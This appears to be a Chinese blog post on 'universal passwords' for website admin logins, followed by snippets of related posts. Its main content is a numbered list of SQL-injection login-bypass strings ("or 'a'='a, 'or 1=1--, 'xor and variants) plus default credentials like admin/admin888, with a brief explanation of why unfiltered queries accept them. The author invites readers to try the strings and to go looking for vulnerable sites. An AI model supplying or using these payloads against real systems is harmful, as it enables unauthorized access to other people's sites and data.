web后台常用的万能密码
网站后台万能密码就是在用户名与密码处都写入下列字符,如果知道管理员帐号的话直接添帐号,效果会更好。
例如我们要利用第一条就是:
用户名:"or “a”="a
密码:"or “a”="a
1:"or “a”="a
2: ‘.).or.(’.a.’=’.a
3:or 1=1–
4:‘or 1=1–
5:a’or’ 1=1–
6:"or 1=1–
7:‘or.‘a.’=‘a
8:“or”="a’=‘a
9:‘or’’=’
10:‘or’=‘or’
原理都是利用SQL语法来利用注入,其实这也是注入的一种,都是因为提交字符未加过滤或过滤不严而导致的。
其实万能是没有的,默认是很多的。
admin
admin
admin
admin888
少数ASP网页后面登陆时可以用密码1’or’1’=‘1(用户名用admin等试)登陆成功。这一般也是SQL注入的第一课,原理涉及到SQL语句……验证登陆时,如果密码=输入的密码,那么登陆成功,把1’ or ‘1’='1带入即“如果密码=1或者1=1那么登成功”由于1=1恒成立,且“密码=1”与“1=1”是逻辑或的关系,则整句为TRUE,即登陆成功。这样说懂不?
其实后台万能登陆密码这个称号真的不那么专业,或许叫做“后台验证绕过语句”还好些,不过前者叫得普遍些。
这个语句就是’xor
xor估计很多人都知道,或者听说过,不就是异或么,他和or以及and都是一样的,但是or进行的是或运算,and进行的是与运算,异或xor则是不等的则是真,即比较的两个值不相同的就对,相同的就错,我搜了一下网上,几乎没有过滤参数,可以用经典’or’='or’进去的,‘xor都可以进去,大家可以尝试一下。
对网站万能密码’or’='or’的浅解
‘or’='or’漏洞是一个比较老的漏洞了,主要是出现在后台登录上,利用这个漏洞,我们可以不用输入密码就直接进入系统的后台.它出现的原因是在编程时逻辑上考虑不周,同时对单引号没有进行过滤,从而导致了漏洞的出现.先给大家简单介绍下漏洞的原理吧,只要大家搞懂了原理,就可以自己去找这样漏洞的系统了。
web后台常用的万能密码相关推荐
- 后台登入万能密码合集
asp aspx万能密码 1: "or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a ...
- 新浪博客登录php发,PHP的万能密码登陆
说实话如果一个网圣元奶粉站的前台都是注入漏洞圣元优博,那么凭经验,万能密圣元优博码进后台的几率基本上优聪百. 可是优聪. 可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜 ...
- 网站后台万能密码/10大常用弱口令
方法 / 步骤 一: 手动探测 先手动猜测几个可能的弱口令,主要是判断站点有没有做登录失败次数限制,若没有限制,则可以使用工具字典工具进行测试 二: 使用字典测试 2.1 字典生成思路 国内很多安全测 ...
- SQL手工注入原理万能密码及默认密码登陆后台
SQL手工注入原理: 下面就是比较笨的方法了== 一个一个试 (* ̄rǒ ̄) 针对于.asp后缀网 + ?id_ 在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点 一.什么是SQL ...
- 万能密码:‘or 1=1-- 实战SQL注入,秒破后台
主要是没有对登录密码的字符串进行参数化和过滤,所以导致网站可以直接用"万能密码"进行突破登录 仅供学习交流 这是某同学做的网站,今天无聊打开了,并帮他进行测试一下 看到这个后台,感 ...
- web安全—万能密码登录(跳过密码验证)
什么是万能密码登录呢,我们可以理解为绕过密码验证.通过构造语句来直接绕过登录的验证. 这里我们举dvwa的靶场为例子 我们打开靶场,看到一个登录页面,上面显示让我们输入用户密码,由于我们不知道他的账号 ...
- .NET版Web后台快速开发框架 Coldairarrow
来源:寒空飞箭 链接:http://www.cnblogs.com/coldairarrow/p/9626691.html 一.简介 本框架旨在为.NET开发人员提供一个Web后台快速开发框架,采用本 ...
- 基于Token的WEB后台认证机制
转载自:基于Token的WEB后台认证机制 几种常用的认证机制 HTTP Basic Auth HTTP Basic Auth简单点说明就是每次请求API时都提供用户的username和passwor ...
- nunito字体_dcat-admin: 使用很少的代码快速构建一个功能完善的高颜值后台系统,内置丰富的后台常用组件,开箱即用,让开发者告别冗杂的HTML代码。...
Dcat Admin是一个基于laravel-admin二次开发而成的后台系统构建工具,只需很少的代码即可快速构建出一个功能完善的高颜值后台系统.内置丰富的后台常用组件,开箱即用,让开发者告别冗杂的H ...
最新文章
- C#版及nodejs版的com端口监听程序
- 深入理解为什么MySQL全表扫描很慢?
- Access 字段拼接(UPDATE 数据追加)
- vue2+node+mysql demo总结
- 为别人着想的表达才是最好的表达
- mysql中有time吗_mysql中 datatime与timestamp的区别说明
- 【MTSP】基于matlab粒子群优化蚁群算法求解多旅行商问题【含Matlab源码 1616期】
- 最新版《神经网络和深度学习》中文版.pdf
- mysql 查找员工入职时间
- tkinter打包为exe后找不到图片 tkinter_TclError:couldn‘t open “a.png“ no such file or directory
- 网线制作IP组网(基于华为eNSP模拟器)
- 小白都能学会的Python基础 第一讲:Python初了解
- 外卖小程序发布商品时,要注意的地方-微信小程序教程32
- The fundamentals of millimeter wave radar sensors——毫米波雷达传感器基本原理
- Hanoi塔问题图文详解
- 【概率论】一种非常巧妙的随机抽样算法
- getElementById的使用方法
- 语音识别长篇研究(四)
- IDEA 编译项目时报:java.lang.OutOfMemoryError:GC overhead limit exceeded
- 使用kitti2bag转换KITTI数据集(一些问题)